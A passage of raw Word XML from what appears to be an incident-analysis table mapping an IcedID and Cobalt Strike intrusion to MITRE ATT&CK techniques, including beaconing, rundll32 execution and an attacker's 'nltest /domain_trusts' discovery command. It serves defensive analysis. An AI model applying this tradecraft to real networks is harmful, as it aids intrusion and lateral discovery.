              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00896EEF" w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07731DBA" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66482077" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78126266" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7455D5D8" w14:textId="463FA498" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>See below (example beaconing)</w:t>
            </w:r>
            <w:r w:rsidR="00543758">
              <w:t>. See also [2] snippet from C2 Network Communication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF76CF" w:rsidRPr="004A56C2" w14:paraId="60A11A94" w14:textId="77777777" w:rsidTr="006351CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3773D36A" w14:textId="05BDDF56" w:rsidR="00EF76CF" w:rsidRPr="004A56C2" w:rsidRDefault="00EF76CF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FF05BB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71825D6D" w14:textId="77777777" w:rsidR="00EF76CF" w:rsidRPr="004A56C2" w:rsidRDefault="00EF76CF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31470939" w14:textId="77777777" w:rsidR="00EF76CF" w:rsidRPr="004A56C2" w:rsidRDefault="00EF76CF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D399578" w14:textId="441C79C3" w:rsidR="00EF76CF" w:rsidRPr="004A56C2" w:rsidRDefault="00EF76CF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0001622D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7527D430" w14:textId="77777777" w:rsidR="00EF76CF" w:rsidRPr="004A56C2" w:rsidRDefault="00EF76CF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14042D1A" w14:textId="77777777" w:rsidR="00EF76CF" w:rsidRPr="004A56C2" w:rsidRDefault="00EF76CF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F42F511" w14:textId="77777777" w:rsidR="00EF76CF" w:rsidRPr="004A56C2" w:rsidRDefault="00EF76CF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C/IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C076F9" w14:textId="34C4C088" w:rsidR="00EF76CF" w:rsidRPr="004A56C2" w:rsidRDefault="00EF76CF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF76CF">
              <w:t xml:space="preserve">While there was some initial discovery activity from the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EF76CF">
              <w:t>IcedID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EF76CF">
              <w:t xml:space="preserve"> malware, it went quiet, just beaconing to command and control but not performing any other activity. After being dormant for over two days, a Cobalt Strike Beacon was dropped and executed on the system infected with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EF76CF">
              <w:t>IcedID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B2731" w:rsidRPr="004A56C2" w14:paraId="7E09C739" w14:textId="77777777" w:rsidTr="006351CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F3F45E" w14:textId="582CC413" w:rsidR="004B2731" w:rsidRPr="004A56C2" w:rsidRDefault="004B2731" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70F29FAC" w14:textId="77777777" w:rsidR="004B2731" w:rsidRPr="004A56C2" w:rsidRDefault="004B2731" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26E48E7C" w14:textId="77777777" w:rsidR="004B2731" w:rsidRPr="004A56C2" w:rsidRDefault="004B2731" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1218.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> System Binary Proxy Execution: Rundll32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="293AEE69" w14:textId="486AFC2C" w:rsidR="004B2731" w:rsidRPr="004A56C2" w:rsidRDefault="004B2731" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D8F0EF" w14:textId="77777777" w:rsidR="004B2731" w:rsidRPr="004A56C2" w:rsidRDefault="004B2731" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="219FE2E8" w14:textId="77777777" w:rsidR="004B2731" w:rsidRPr="004A56C2" w:rsidRDefault="004B2731" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DD0AF35" w14:textId="77777777" w:rsidR="004B2731" w:rsidRPr="004A56C2" w:rsidRDefault="004B2731" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19DE3E53" w14:textId="2F1D603D" w:rsidR="004B2731" w:rsidRPr="004A56C2" w:rsidRDefault="004B2731" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Day 3 </w:t>
            </w:r>
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve">rundll32.exe </w:t>
            </w:r>
            <w:r>
              <w:t>execution of cobalt strike</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15272" w:rsidRPr="00B857D7" w14:paraId="4236F753" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="485447C5" w14:textId="111590D4" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="645234BE" w14:textId="61DE9DF4" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="003227C3">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1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40BE579B" w14:textId="6CC61368" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15272">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F15272">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6133B571" w14:textId="47199F53" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C48B9E" w14:textId="77777777" w:rsidR="00F15272" w:rsidRPr="00B857D7" w:rsidRDefault="00F15272" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A2CDE86" w14:textId="345E7594" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5661A860" w14:textId="000F2375" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B2D0178" w14:textId="41C837AD" w:rsidR="00F15272" w:rsidRDefault="00F15272" w:rsidP="00F15272">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">cmd.exe /C </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nltest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>domain_trusts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (via Cobalt Strike). See below</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B8541B7" w14:textId="689E31AE" w:rsidR="00F15272" w:rsidRDefault="00F15272" w:rsidP="00F15272">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003227C3" w:rsidRPr="00B857D7" w14:paraId="565DE624" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7598300C" w14:textId="1359163F" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0022017D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A783AFC" w14:textId="18EFACD1" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>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217BD4DA" w14:textId="3DC581DA" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1482 Domain Trust Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A179FA" w14:textId="41157656" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007E2AFE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD129F0" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4242A5EB" w14:textId="4AEFAD17" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11E3F806" w14:textId="67D01BD4" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71AEB4E0" w14:textId="7E8212B9" w:rsidR="003227C3" w:rsidRPr="00D11489" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF76CF">
              <w:t>The threat actors then ran another round of discovery activity with native windows utilities such as nltest.exe, whoami.exe, and net.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15272" w:rsidRPr="00B857D7" w14:paraId="62973BD7" w14:textId="77777777" w:rsidTr="006351CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B27C12A" w14:textId="1FA1EDF0" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0022017D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F2A3715" w14:textId="77777777" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">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1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="018FFDC5" w14:textId="0292290F" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15272">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F15272">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
